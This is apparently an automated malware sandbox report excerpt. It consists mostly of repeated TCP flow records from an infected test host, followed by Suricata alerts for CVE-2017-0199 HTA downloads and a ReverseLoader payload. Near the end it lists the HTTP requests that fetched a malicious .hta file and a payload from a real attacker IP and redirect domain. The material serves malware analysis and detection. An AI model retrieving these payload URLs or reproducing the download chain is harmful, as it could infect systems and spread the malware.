              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165

              Networking

              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49164
              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49162
              Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 146.70.113.200:80
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49172
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49167
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 146.70.113.200:80
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 146.70.113.200:80
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 146.70.113.200:80
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
